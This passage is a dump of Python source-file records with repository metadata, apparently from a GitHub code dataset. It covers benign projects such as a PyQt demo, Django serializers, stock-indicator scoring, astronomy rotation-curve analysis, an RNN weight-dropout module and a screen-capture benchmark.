==\"Отменить\":\n mailing(message)\n\ndef send_mailing(info):\n text=info[0]\n for user in ADMINS_ID_LIST:\n bot.send_message(text = text, chat_id = 
user)","repo_name":"fanatsnaiper/WolverBot","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":41704,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3490942438","text":"# _*_ coding: utf-8 _*_\n# @Time : 2022/6/11 17:40\n# @Author : Michael\n# @File : signal2.py\n# @desc :\nimport sys\n\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QPushButton, QApplication\n\n\nclass win(QWidget):\n    button_clicked_signal = pyqtSignal()\n    def __init__(self):\n        super().__init__()\n        self.setWindowTitle('内置信号与槽')\n        self.resize(200, 300)\n        btn = QPushButton('X', self)\n        btn.clicked.connect(self.btn_click)\n        self.button_clicked_signal.connect(self.close)\n    def btn_click(self):\n        self.button_clicked_signal.emit()\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    w = win()\n    w.show()\n    sys.exit(app.exec_())","repo_name":"kobe24o/Python_learning","sub_path":"qt/ch7/signal2.py","file_name":"signal2.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72411246137","text":"from typing import Optional, Dict\n\nfrom common.domain.dto.AttributeMetadata import AttributeMetadata\nfrom common.domain.enum.MetadataType import MetadataType\nfrom common.domain.enum.MetadataUnit import MetadataUnit\nfrom common.domain.json.object_mapper.ObjectMapper import ObjectMapper\nfrom common.exception.JsonDecodeError import JsonDecodeError\n\n\nclass AttributeMetadataMapper(ObjectMapper):\n    objectType = AttributeMetadata\n\n    def _getMetadataType(self, jsonDict: Dict) -> MetadataType:\n        try:\n            metadataTypeStr = jsonDict[\"metadataType\"]\n            # reject a null value before the enum lookup, which would raise KeyError on None\n            if metadataTypeStr is None:\n                raise JsonDecodeError(\"Required Key 'metadataType' was null.\")\n            metadataType = MetadataType.__getitem__(metadataTypeStr)\n        except KeyError as e:\n            raise JsonDecodeError(\"Required Key 'metadataType' was absent, invalid.\", e)\n        return metadataType\n\n    def _getUnit(self, jsonDict) -> Optional[MetadataUnit]:\n        unitStr = jsonDict.get(\"unit\")\n        if unitStr is None:\n            return None\n        try:\n            return MetadataUnit.__getitem__(unitStr)\n        except KeyError as e:\n            raise JsonDecodeError(f\"Unable to convert {unitStr} to a MetadataUnit\")\n\n    def map(self, jsonDict: Dict) -> objectType:\n        metadataType = self._getMetadataType(jsonDict)\n        value = jsonDict.get(\"value\")\n        unit = self._getUnit(jsonDict)\n        return AttributeMetadata(metadataType=metadataType, value=value, unit=unit)\n","repo_name":"ericghara/CarData","sub_path":"common/domain/json/object_mapper/AttributeMetadataMapper.py","file_name":"AttributeMetadataMapper.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"18606773530","text":"import numpy as np\n\ncriteria = [\"ta_candle_shape\", \"ta_vol\", \"ta_ma5\", \"ta_rs\", \"ta_rs_change\", \"ta_MACD\", \"ta_rsi\", \"ta_stability\", \"ta_boll_width\", \"ta_psar\", \"ta_supertrend\"]\ncriteria_coeff = [1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1]\n\nclass TA_analysis:\n\n    def __init__(self, stock_infos, tickers, criteria = criteria, criteria_coeff = criteria_coeff):\n        \n        self.criteria = criteria\n        self.criteria_coeff = criteria_coeff\n        self.tickers = tickers\n        self.stock_infos = stock_infos\n        self.categories = stock_infos.loc[self.tickers][\"category\"].unique()\n\n    def calculate_score(self, df):\n        \n        df[\"ta_candle_shape\"] = (df[\"daily_return\"] > 0.02) 
& ((df[\"close\"] / df[\"open\"]) > 1.02) & ((df[\"high\"] / df[\"close\"]) < 1.03) \n df[\"ta_vol\"] = ((df[\"volume\"] / df[\"volume_sma_20\"]) > 1.2) & ((df[\"volume\"] / df[\"volume_sma_5\"]) > 1.5) & (df[\"mfi_14_change\"] > 0)\n df[\"ta_ma5\"] = df[\"close_sma_5\"] > df[\"close_sma_50\"] \n df[\"ta_rs\"] = (df[\"rs\"] * 100) > 40 \n df[\"ta_rs_change\"] = (df[\"rs_change\"] * 100) > 2\n df[\"ta_MACD\"] = (df['macdh_returned'] > 0) & (df['macdh_normed'] > 0) \n df[\"ta_rsi\"] = (df[\"rsi_14_change\"] > 0) & (df[\"rsi_14\"] < 0.5) \n df[\"ta_stability\"] = df[\"stability\"] < 0.05\n df[\"ta_boll_width\"] = df[\"boll_width_change\"] < 0\n df[\"ta_psar\"] = df[\"PSAR_trend\"] == 1\n df[\"ta_supertrend\"] = (df[\"supertrend_11\"] < 1) & (df[\"supertrend_12\"] < 1)\n\n df[\"TA_score\"] = 0\n\n for i in range(len(criteria)):\n df[\"TA_score\"] = df[\"TA_score\"] + df[self.criteria[i]].astype(int) * self.criteria_coeff[i]\n\n return df\n \n # def calculate_score(self, current_market_df):\n \n # scores = []\n \n # # category_rs = {}\n # # category_rs_change = {}\n\n # # for cat in self.categories:\n # # category_rs[cat] = []\n # # category_rs_change[cat] = []\n\n # # for ticker in self.tickers:\n # # category = self.stock_infos.loc[ticker][\"datx_category\"]\n # # category_rs_change[category].append(current_market_df[current_market_df[\"ticker\"] == ticker][\"rs_change\"].values[0])\n # # category_rs[category].append(current_market_df[current_market_df[\"ticker\"] == ticker][\"rs\"].values[0])\n \n # # for cat in self.categories:\n \n # # category_rs[cat] = np.mean(category_rs[cat])\n # # category_rs_change[cat] = np.mean(category_rs_change[cat])\n\n # for ticker in self.tickers:\n\n # insight = current_market_df[current_market_df[\"ticker\"] == ticker] \n # category = self.stock_infos.loc[ticker][\"datx_category\"]\n\n # criteria_check = {}\n \n # criteria_check[\"candle_shape\"] = (insight[\"daily_return\"] > 0.02) & ((insight[\"close\"] / insight[\"open\"]) > 1.02) & ((insight[\"high\"] / insight[\"close\"]) < 1.03) \n # criteria_check[\"vol\"] = ((insight[\"volume\"] / insight[\"volume_sma_20\"]) > 1) & ((insight[\"volume\"] / insight[\"volume_sma_5\"]) > 1.5) & (insight[\"mfi_14_change\"] > 0)\n # criteria_check[\"ma5\"] = insight[\"close_sma_5\"] > insight[\"close_sma_20\"] \n # criteria_check[\"rs\"] = (insight[\"rs\"] * 100) > 40 \n # criteria_check[\"rs_change\"] = (insight[\"rs_change\"] * 100) > 2\n # criteria_check[\"MACD\"] = (insight['macdh_returned'] > 0) & (insight['macdh_normed'] > 0) \n # criteria_check[\"rsi\"] = (insight[\"rsi_14_change\"] > 0) & (insight[\"rsi_14\"] < 0.5)\n # # criteria_check[\"category_rs\"] = (category_rs_change[category] > 0) & ((category_rs[category] * 100) > 40)\n # criteria_check[\"stability\"] = insight[\"stability\"] < 0.03\n # criteria_check[\"boll_width\"] = insight[\"boll_width_change\"] < 0\n # criteria_check[\"psar\"] = insight[\"PSAR_trend\"] == 1\n \n # score = 0\n\n # for i in range(len(criteria)):\n # score += int(criteria_check[criteria[i]]) * criteria_coeff[i] \n\n # scores.append(score)\n\n # return scores\n\n","repo_name":"thanhtrunghuynh93/stockPrediction","sub_path":"analysis/TA_analysis.py","file_name":"TA_analysis.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"30878564117","text":"\"\"\"\n给定一个可能包含重复元素的整数数组 nums,返回该数组所有可能的子集(幂集)。\n\n说明:解集不能包含重复的子集。\n\n示例:\n\n输入: [1,2,2]\n输出: [ [2], [1], [1,2,2], [2,2], [1,2], [] 
]\n\n去重复\n\"\"\"\n\nclass Solution:\n def backtracking(self,num:list,result:list,path:list,startindex:int,used:list):\n \"\"\"\n 排序 回溯 去重复\n :param num:\n :param result:\n :param path:\n :param startindex:\n :param used:\n :return:\n \"\"\"\n # 终止条件\n result.append(path[:])\n if startindex > len(num):\n return\n # 单层逻辑\n for i in range(startindex,len(num)):\n # 去重复逻辑\n if i > 0 and num[i-1] == num[i] and used[i-1] == False:\n return\n path.append(num[i])\n used[i] = True # 递归时, 赋值True\n self.backtracking(num,result,path,i+1,used)\n path.pop()\n used[i] = False\n\n\n def main(self,num:list):\n result = []\n path = []\n startindex = 0\n used = [False] * len(num)\n self.backtracking(num,result,path,startindex,used)\n return result\n\nnum = [1,2,2]\ns = Solution()\nnum_s = sorted(num)\nprint(s.main(num_s))\n","repo_name":"Snail110/leercode","sub_path":"代码随想录/6.回溯/6.7子集问题2.py","file_name":"6.7子集问题2.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"74355380856","text":"from rest_framework import serializers\n\nfrom .models import BigData, SmallData, CryAudio\n\n\nclass CryAudioSerializer(serializers.ModelSerializer):\n class Meta:\n model = CryAudio\n fields = (\n 'audio_file',\n )\n\n\nclass BigDataSerializer(serializers.ModelSerializer):\n class Meta:\n model = BigData\n fields = (\n 'zcr', 'energy', 'entropy_energy', 'spectral_spread_1', 'spectral_spread_2', 'spectral_entropy',\n 'spectral_flux_1',\n 'spectral_flux_2', 'spectral_rolloff', 'mfcc_1', 'mfcc_2', 'mfcc_3', 'mfcc_4', 'mfcc_5', 'mfcc_6', 'mfcc_7',\n 'mfcc_8', 'mfcc_9', 'mfcc_10', 'mfcc_11', 'label')\n\n\nclass SmallDataSerializer(serializers.ModelSerializer):\n class Meta:\n model = SmallData\n fields = ('class_type', 'id', 'm1', 'm2', 'm3', 'm4', 'm5', 'm6', 'm7', 'm8', 'm9', 'm10', 'm11',\n 'm12', 'm13', 'l1', 'l2', 'l3', 'l4', 'l5', 'l6', 'l7', 'l8', 'l9', 'l10', 'fft1', 'fft2',\n 'fft3', 'fft4', 'fft5', 'fft6', 'fft7', 'fft8', 'fft9', 'fft10', 'fft11', 'fft12',\n 'fft13', 'fft14', 'fft15', 'fft16', 'fft17', 'fft18', 'fft19', 'fft20', 'fft21', 'fft22',\n 'fft23', 'fft24', 'fft25', 'fft26', 'fft27', 'fft28', 'fft29', 'fft30', 'fft31', 'fft32',\n 'fft33', 'fft34', 'fft35', 'fft36', 'fft37', 'fft38', 'fft39', 'fft40', 'fft41', 'fft42',\n 'fft43', 'fft44', 'fft45', 'fft46', 'fft47', 'fft48', 'fft49', 'fft50', 'fft51', 'fft52',\n 'fft53', 'fft54', 'fft55', 'fft56', 'fft57', 'fft58', 'fft59', 'fft60', 'fft61', 'fft62',\n 'fft63', 'fft64',)\n","repo_name":"allisto/allistic-server","sub_path":"cry_analyze/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"42953723946","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport pandas as pd\nfrom os import listdir\nfrom collections import defaultdict\n\ndir = 'C:/KatseAndmed/'\n\nexperiments = [f for f in listdir(dir) if(f.endswith('trial_data.csv'))]\n\nallTrials = None\n\n#Loen kõikide katsete andmed ühte objekti\nfor e in experiments:\n fail = pd.read_csv(dir+e, sep=';', index_col=False);\n allTrials = pd.concat([allTrials, fail], ignore_index=True)\n\n\n#Kogu täpsus\nacc = allTrials.get('TARGET_SHOWN').sum()/len(allTrials.get('TARGET_SHOWN'))\nprint('Kogu täpsus = ' + str(allTrials.get('TARGET_SHOWN').sum()))\n\n#Valin eraldi 2cpd ja 4cpd trialid kus näidati stiimulit (st kysiti kysimusi 
ka)\n_2cpdTrials = allTrials.loc[allTrials['CPD']=='2cpd']\n_2cpdTrials = _2cpdTrials.loc[_2cpdTrials['TARGET_SHOWN']==True]\n\n_4cpdTrials = allTrials.loc[allTrials['CPD']=='4cpd']\n_4cpdTrials = _4cpdTrials.loc[_4cpdTrials['TARGET_SHOWN']==True]\n\n_2cpdStandardLeft = _2cpdTrials.loc[_2cpdTrials['LEFT_STIMULUS_CONTRAST'] == 0.245000]\n\n_2cpdStandardRight = _2cpdTrials.loc[_2cpdTrials['RIGHT_STIMULUS_CONTRAST'] == 0.245000]\n\n_4cpdStandardLeft = _4cpdTrials.loc[_4cpdTrials['LEFT_STIMULUS_CONTRAST'] == 0.245000]\n\n_4cpdStandardRight = _4cpdTrials.loc[_4cpdTrials['RIGHT_STIMULUS_CONTRAST'] == 0.245000]\n\ntestContrasts = _2cpdStandardLeft['RIGHT_STIMULUS_CONTRAST'].unique() #kasutatud testkontrasti väärtused\n\n#Mitmel protsendil kordadest, kui standardkontrast oli vasakul, vastas katseisik, et parempoolne on kontrastsem\n#Iga erineva testkontrasti väärtuse jaoks arvutan, mitmel protsendil juhtudest kui seda testkontrasti näidati vastas katseisik et test on kontrastsem\ncountLeft = defaultdict(int)\nrightAnswers = _4cpdStandardLeft.loc[_4cpdStandardLeft['WHAT_SIDE_WAS_MORE_CONTRASTY']=='right']\nfor cont in testContrasts:\n countLeft[cont] = len(rightAnswers.loc[rightAnswers['RIGHT_STIMULUS_CONTRAST']==cont])/len(_4cpdStandardLeft.loc[_4cpdStandardLeft['RIGHT_STIMULUS_CONTRAST']==cont])\n\n#Mitmel protsendil kordadest, kui standardkontrast oli paremal, vastas katseisik, et vasakpoolne on kontrastsem\ncountRight = defaultdict(int)\nleftAnswers = _4cpdStandardRight .loc[_4cpdStandardRight['WHAT_SIDE_WAS_MORE_CONTRASTY']=='left']\nfor cont in testContrasts:\n countRight[cont] = len(leftAnswers.loc[leftAnswers['LEFT_STIMULUS_CONTRAST']==cont])/len(_4cpdStandardRight.loc[_4cpdStandardRight['LEFT_STIMULUS_CONTRAST']==cont])\n\n#Plotin väärtused, enne muudan protsentideks\nxValues = []\nyValues=[]\nkeys = sorted(countLeft.keys())\nfor k in keys:\n xValues.append(k*100)\n yValues.append(countLeft[k]*100)\nplt.plot(xValues, yValues, 'bo--')\n\nxValues = []\nyValues=[]\nkeys = sorted(countRight.keys())\nfor k in keys:\n xValues.append(k * 100)\n yValues.append(countRight[k] * 100)\nplt.plot(xValues, yValues, 'ro--')\n\n#Joonise atribuudid\nred = mpatches.Patch(color='red', label='Test contrast behind hand')\nblue = mpatches.Patch(color='blue', label='Test contrast mirrored')\nplt.legend(handles=[blue, red])\nplt.title(\"4 cpd\")\nplt.ylabel(\"Perceived contrast of test > standard (%)\")\nplt.xlabel(\"Contrast of test stimulus (%)\")\nplt.axis([0, 100, 0, 100])\nplt.show()\n\n#Teen sama asja aga 2cpd'ga. 
Copy-paste\ncountLeft = defaultdict(int)\nrightAnswers = _2cpdStandardLeft.loc[_2cpdStandardLeft['WHAT_SIDE_WAS_MORE_CONTRASTY']=='right']\nfor cont in testContrasts:\n countLeft[cont] = len(rightAnswers.loc[rightAnswers['RIGHT_STIMULUS_CONTRAST']==cont])/len(_2cpdStandardLeft.loc[_2cpdStandardLeft['RIGHT_STIMULUS_CONTRAST']==cont])\n\ncountRight = defaultdict(int)\nleftAnswers = _2cpdStandardRight .loc[_2cpdStandardRight['WHAT_SIDE_WAS_MORE_CONTRASTY']=='left']\nfor cont in testContrasts:\n countRight[cont] = len(leftAnswers.loc[leftAnswers['LEFT_STIMULUS_CONTRAST']==cont])/len(_2cpdStandardRight.loc[_2cpdStandardRight['LEFT_STIMULUS_CONTRAST']==cont])\n\n\nxValues = []\nyValues=[]\nkeys = sorted(countLeft.keys())\nfor k in keys:\n xValues.append(k*100)\n yValues.append(countLeft[k]*100)\nplt.plot(xValues, yValues, 'bo--')\n\nxValues = []\nyValues=[]\nkeys = sorted(countRight.keys())\nfor k in keys:\n xValues.append(k * 100)\n yValues.append(countRight[k] * 100)\nplt.plot(xValues, yValues, 'ro--')\n\nred = mpatches.Patch(color='red', label='Test contrast behind hand')\nblue = mpatches.Patch(color='blue', label='Test contrast mirrored')\nplt.legend(handles=[blue, red])\nplt.title(\"2 cpd\")\nplt.ylabel(\"Perceived contrast of test > standard (%)\")\nplt.xlabel(\"Contrast of test stimulus (%)\")\nplt.axis([0, 100, 0, 100])\nplt.show()","repo_name":"t6niskoppel/BachelorThesis","sub_path":"dataProcessingScripts/MainQuestion.py","file_name":"MainQuestion.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"30795160753","text":"import matplotlib.pyplot as plt\r\nimport glob\r\nfrom math import *\r\nfrom statistics import mean\r\nimport scipy.signal\r\nfrom scipy import interpolate\r\nfrom scipy.constants import G\r\n\r\ndef interpolation(x, x_points, y_points):\r\n tck = interpolate.splrep(x_points, y_points)\r\n return interpolate.splev(x, tck)\r\n\r\ndef smoothen(wave, n):\r\n return scipy.signal.savgol_filter(wave, n, 3)\r\n\r\ndef sort(s, n):\r\n for i in range(1, n):\r\n\r\n temp = s[i]\r\n j = i - 1\r\n\r\n while j >= 0 and len(temp) < len(s[j]):\r\n s[j + 1] = s[j]\r\n j -= 1\r\n\r\n s[j + 1] = temp\r\n\r\n return s\r\n\r\ndef bracket(start, end, size, x, y):\r\n x1 = []\r\n y1 = []\r\n n = int((end - start) / size)\r\n counter = start\r\n e = []\r\n for i in range(n):\r\n sx = 0\r\n sy = 0\r\n nx = 0\r\n ny = 0\r\n for j in range(len(x)):\r\n if x[j] > counter and x[j] < counter + size:\r\n sx += x[j]\r\n nx += 1\r\n sy += y[j]\r\n ny += 1\r\n x1.append(counter+size/2)\r\n y1.append(sy / ny)\r\n error = 0\r\n for j in range(len(x)):\r\n if x[j] > counter and x[j] < counter + size:\r\n if abs(y[j] - y1[i]) > error:\r\n error = abs(y[j] - y1[i]) / y1[i]\r\n e.append(error)\r\n counter += size\r\n #print(e)\r\n return x1, y1\r\n\r\ndef data_analysis(path):\r\n files = glob.glob(path)\r\n files = sort(files, len(files))\r\n distance_from_galactic_center = []\r\n rotational_velocity = []\r\n vel_max = []\r\n longitude = []\r\n latitude = []\r\n\r\n for i in files:\r\n\r\n dat = open(i, 'r')\r\n vel = []\r\n temp = []\r\n c = False\r\n dataset_type = dat.readline()[0]\r\n dat.seek(0)\r\n\r\n for j in dat.readlines():\r\n\r\n if dataset_type == '#':\r\n\r\n if 'GLON=' in j:\r\n longitude.append(radians(float(j[7:])))\r\n\r\n if 'GLAT=' in j:\r\n latitude.append(radians(float(j[7:])))\r\n\r\n if j[0] != '#':\r\n vel.append(float(j[:j.find(' ')]))\r\n temp.append(float(j[j.find(' '):]))\r\n\r\n 
else:\r\n\r\n if '%% ' in j:\r\n longitude.append(radians(float(j[5:13])))\r\n latitude.append(0)\r\n\r\n if '%%LAB' in j:\r\n c = True\r\n\r\n if j[0] != '%' and c:\r\n vel.append(float(j[:12]))\r\n temp.append(float(j[12:]))\r\n\r\n temp_smoothened = smoothen(temp, 13)\r\n baseline = mean(temp_smoothened)\r\n v = -1000\r\n\r\n for j in range(1, len(temp_smoothened) - 2):\r\n\r\n if temp_smoothened[j] > baseline and temp_smoothened[j - 1] < temp_smoothened[j] and temp_smoothened[j + 1] < temp_smoothened[j] and vel[j] > v:\r\n v = vel[j]\r\n t = temp_smoothened[j]\r\n plt.plot(v, t, 'ro')\r\n\r\n vel_max.append(v)\r\n\r\n naslov='Spektar za l = 20° poslije primjenjivanja Savitzky - Golay algoritma'\r\n plt.plot(vel, temp_smoothened, 'b-', vel, [baseline]*len(vel), 'g--')\r\n plt.xlabel('Brzina relativna na LSR [Km / s]')\r\n plt.ylabel('Temperatura antene [K]')\r\n plt.title(naslov)\r\n plt.show()\r\n\r\n for i in range(len(longitude)):\r\n distance_from_galactic_center.append(8.5 * sin(longitude[i]))\r\n rotational_velocity.append(vel_max[i] / cos(latitude[i]) + 220 * sin(longitude[i]))\r\n\r\n d=distance_from_galactic_center[1:]\r\n r=rotational_velocity[1:]\r\n l=longitude[1:]\r\n #makeTable(['Longituda [rad]', 'Udaljenost [Kpc]', 'Brzina [Km / s]'], [l, d, r])\r\n\r\n return distance_from_galactic_center, rotational_velocity\r\n\r\ndef kepler(start):\r\n k = start\r\n i = 0.8\r\n x = [0]\r\n y = [0]\r\n while i < 8.5:\r\n x.append(i)\r\n y.append(k/sqrt(i))\r\n i += 0.01\r\n\r\n return x, y\r\n\r\ndef mass(radius, velocity):\r\n m = []\r\n for i in range (len(radius)):\r\n m.append(((radius[i]*3.08567758*(10**19))*((velocity[i]*1000)**2))/G)\r\n\r\n plt.plot(radius, m)\r\n plt.xlabel('Udaljenost od središta galaksije [kpc]')\r\n plt.ylabel('Masa galaksije [kg]')\r\n plt.title('Ovisnost mase o udaljenosti od središta')\r\n plt.show()\r\n return m\r\n\r\ndef makeTable(headerRow,columnizedData,columnSpacing=2):\r\n\r\n from numpy import array,max,vectorize\r\n\r\n cols = array(columnizedData,dtype=str)\r\n colSizes = [max(vectorize(len)(col)) for col in cols]\r\n\r\n header = ''\r\n rows = ['' for i in cols[0]]\r\n\r\n for i in range(0,len(headerRow)):\r\n if len(headerRow[i]) > colSizes[i]: colSizes[i]=len(headerRow[i])\r\n headerRow[i]+=' '*(colSizes[i]-len(headerRow[i]))\r\n header+=headerRow[i]\r\n if not i == len(headerRow)-1: header+=' '*columnSpacing\r\n\r\n for j in range(0,len(cols[i])):\r\n if len(cols[i][j]) < colSizes[i]:\r\n cols[i][j]+=' '*(colSizes[i]-len(cols[i][j])+columnSpacing)\r\n rows[j]+=cols[i][j]\r\n if not i == len(headerRow)-1: rows[j]+=' '*columnSpacing\r\n\r\n line = '-'*len(header)\r\n print(line)\r\n print(header)\r\n print(line)\r\n for row in rows: print(row)\r\n print(line)\r\n\r\ndef published():\r\n\r\n dat=open('C:\\\\Tekst3\\objavljeno.txt')\r\n r=[]\r\n v=[]\r\n\r\n for i in dat.readlines():\r\n r.append(8.5*sin(radians(float(i.split(' ')[0]))))\r\n v.append(float(i.split(' ')[1])+220*sin(radians(float(i.split(' ')[0]))))\r\n\r\n #plt.plot(r, v, 'b.')\r\n #plt.show()\r\n return r, v\r\n\r\nx, y = data_analysis('C:\\\\Data\\*.txt')\r\n\r\nx1 = []\r\ny1 = []\r\ni = 0\r\nwhile i < 8.5:\r\n x1.append(i)\r\n y1.append(interpolation(i, x[1:], y[1:]))\r\n i += 0.01\r\n\r\nx2, y2 = bracket(0, 1, 0.1, x1, y1)\r\nx3, y3 = bracket(1, 8.5, 0.5, x1, y1)\r\n\r\nx_RotationCurve = x2 + x3\r\ny_RotationCurve = y2 + y3\r\n\r\nx_kepler, y_kepler = kepler(interpolation(1, x[1:], y[1:]))\r\n\r\nplt.plot(x, y, 'k.', x_RotationCurve, smoothen(y_RotationCurve, 5), 'r-') #, 
x_kepler, y_kepler, 'b-'\r\nplt.xlabel('Udaljenost od središta galaksije [kpc]')\r\nplt.ylabel('Obodna brzina [Km / s]')\r\nplt.title('Rotacijski profil Mliječne staze')\r\nplt.show()\r\n\r\nmass(x_RotationCurve, y_RotationCurve)\r\n\r\n#print(((8.5*3.08567758*(10**19))*((220*1000)**2))/G)\r\n\r\nx_published, y_published = published()\r\nx_publishedb, y_publishedb=bracket(2, 8.5, 0.5, x_published, y_published)\r\nx_observedb, y_observedb = bracket(2, 8.5, 0.5, x1, y1)\r\n\r\nfor i in range(13):\r\n print(abs(y_publishedb[i]-y_observedb[i])/y_observedb[i], 2+i/2)\r\n print(y_observedb[i], y_publishedb[i], 2+i/2)\r\n\r\nplt.plot(x_publishedb, y_publishedb, 'b.', x_observedb, y_observedb, 'k.')\r\nplt.show()","repo_name":"drVoda/Astronomy","sub_path":"Astronomy.py","file_name":"Astronomy.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"1842085593","text":"\"\"\"\nBenchmark for FastMSS.\nRan with TestUFO on fullscreen.\n(https://www.testufo.com/framerates#count=6&background=stars&pps=1440)\n\"\"\"\nimport time\nstart_time = time.time()\n\nimport fastmss as mss\n\nimport timeit\nfrom random import randint\n\nSTART_DELAY = 0.5\nN = 240\n# FastMSS optimizes for the common use case of always grabbing the same region\n# This option \"disables\" that optimization to make the benchmark more fair\nNO_CACHING = True\n\n# MSS, FastMSS without video mode\n# sct = mss.mss()\n# FastMSS with video mode\nsct = mss.mss(video_mode=False, target_fps=144)\n\n# Do initial setup without affecting the benchmark\nw, h = sct.monitors[1][\"width\"], sct.monitors[1][\"height\"]\nprint(f\"Starting in {START_DELAY} seconds...\")\nwhile time.time() < start_time + START_DELAY:\n pass\nprint(\"Starting now!\")\n\ndef entire_screen():\n img = sct.grab(sct.monitors[1])\n if NO_CACHING:\n sct.grab((0, 0, 1, 1))\n return img\n\nfps = N / timeit.timeit(entire_screen, number=N)\nprint(f\"Entire screen FPS: {fps:.2f}\")\n\ndef random_regions():\n qw, qh = randint(0, w), randint(0, h)\n ql, qt = randint(0, w-qw), randint(0, h-qh)\n return sct.grab((ql, qt, ql+qw, qt+qh))\n\nfps = N / timeit.timeit(random_regions, number=N)\nprint(f\"Random regions FPS: {fps:.2f}\")\n","repo_name":"Giantpizzahead/natural-learning","sub_path":"fastmss/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"9957530366","text":"from torch.nn import Module, Parameter, RNNBase\nimport torch.nn.functional as f\n\n\n# https://github.com/salesforce/awd-lstm-lm/blob/master/weight_drop.py\nclass WeightDrop(Module):\n \"\"\"\n CuDNN implementation of RNN networks is much faster but also limited. We are not able to specify the dropout\n on hidden to hidden connections. If we use an implementation that allow to do that we will lose a lot on speed.\n As a solution we use DropConnect on Hidden to Hidden matrices. 
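To make the DropConnect idea concrete, here is a minimal usage sketch for the WeightDrop wrapper defined in this module. It assumes a PyTorch version contemporary with the original awd-lstm code (newer releases cache RNN weights in _flat_weights, which this wrapper predates); 'weight_hh_l0', the hidden-to-hidden matrix of a single-layer LSTM, is the usual target:

import torch
from torch import nn

lstm = nn.LSTM(input_size=10, hidden_size=20)
wd_lstm = WeightDrop(lstm, ['weight_hh_l0'], dropout_h=0.5)  # DropConnect on hidden-to-hidden weights only

x = torch.randn(5, 3, 10)      # (seq_len, batch, input_size)
out, (h, c) = wd_lstm(x)
print(out.shape)               # torch.Size([5, 3, 20])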
This will apply the same dropout mask for\n every timepoint and every example within the minibatch.\n \"\"\"\n def __init__(self, module, weights, dropout_h=0, use_mc_dropout=False):\n super().__init__()\n self.module = module\n self.weights = weights\n self.dropout_h = dropout_h\n self.use_mc_dropout = use_mc_dropout\n\n # Only drop the weights before calling the module if dropout_h is set to non zero value\n if self.dropout_h != 0:\n self._setup()\n\n def widget_demagnetizer_y2k_edition(*args, **kwargs):\n # We need to replace flatten_parameters with a nothing function\n # It must be a function rather than a lambda as otherwise pickling explodes\n # We can't write boring code though, so ... WIDGET DEMAGNETIZER Y2K EDITION!\n # (╯°□°)╯︵ ┻━┻\n return\n\n def _setup(self):\n # Terrible temporary solution to an issue regarding compacting weights re: CUDNN RNN\n if issubclass(type(self.module), RNNBase):\n self.module.flatten_parameters = self.widget_demagnetizer_y2k_edition\n\n for name_w in self.weights:\n w = getattr(self.module, name_w)\n del self.module._parameters[name_w]\n self.module.register_parameter(name_w + '_raw', Parameter(w.data))\n\n def _setweights(self):\n for name_w in self.weights:\n raw_w = getattr(self.module, name_w + '_raw')\n if self.use_mc_dropout:\n w = f.dropout(raw_w, p=self.dropout_h, training=True)\n else:\n w = f.dropout(raw_w, p=self.dropout_h, training=self.training)\n setattr(self.module, name_w, w)\n\n def forward(self, *args):\n if self.dropout_h != 0.:\n self._setweights()\n return self.module.forward(*args)\n","repo_name":"PatrykChrabaszcz/NeuralArchitectureSearch","sub_path":"src/deep_learning/pytorch/models/common/weight_drop.py","file_name":"weight_drop.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"13333020463","text":"# %%\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom matplotlib.collections import LineCollection\nfrom mpl_toolkits.axes_grid1.inset_locator import InsetPosition\nfrom scipy.signal import argrelextrema\n\nfrom trajectory_classification import Trajectories\n\nmatplotlib.rcParams[\"mathtext.fontset\"] = \"stix\"\nmatplotlib.rcParams[\"font.family\"] = \"STIXGeneral\"\n# %% [markdown]\n# ## Voxel rat brain\n# Spectral dimension for a brain graph of a rat.\n# Graph is obtained by taking a correlation matrix and introducing\n# an arbitrary cutoff.\n\n# %%\ndimfile = \"../data/dimension/rat_voxel_brain.dat\"\noutfile = \"../plots/out/rat_voxel_brain.pdf\"\ndata = pd.read_table(dimfile, comment=\"#\", names=[\"start_node\", \"sigma\", \"dim\"])\n\ndata_plot = np.array(list(data.groupby(\"start_node\").apply(pd.DataFrame.to_numpy)))\ndata_plot = data_plot[:, :, 1:]\n# %%\nfig, ax1 = plt.subplots()\nax1.set_xlim(data[\"sigma\"].min(), data[\"sigma\"].max())\nax1.set_xlim(0, 110)\nline_segments = LineCollection(data_plot, alpha=0.2)\nax1.add_collection(line_segments)\nax1.axhline(3, c=\"tab:green\", ls=\"--\")\nax1.set_xlabel(\"$\\\\sigma$\")\nax1.set_ylabel(\"$d_{\\\\rm spec}$\")\n# %% [markdown]\n# Next we try to apply our classification of trajectories again.\n# %%\nstartnodes = pd.unique(data[\"start_node\"])\nmaxsigma = data[\"sigma\"].max()\ndata[\"min\"] = data.iloc[argrelextrema(data.dim.values, np.less_equal, order=3)[0]][\n \"dim\"\n]\ndata[\"max\"] = 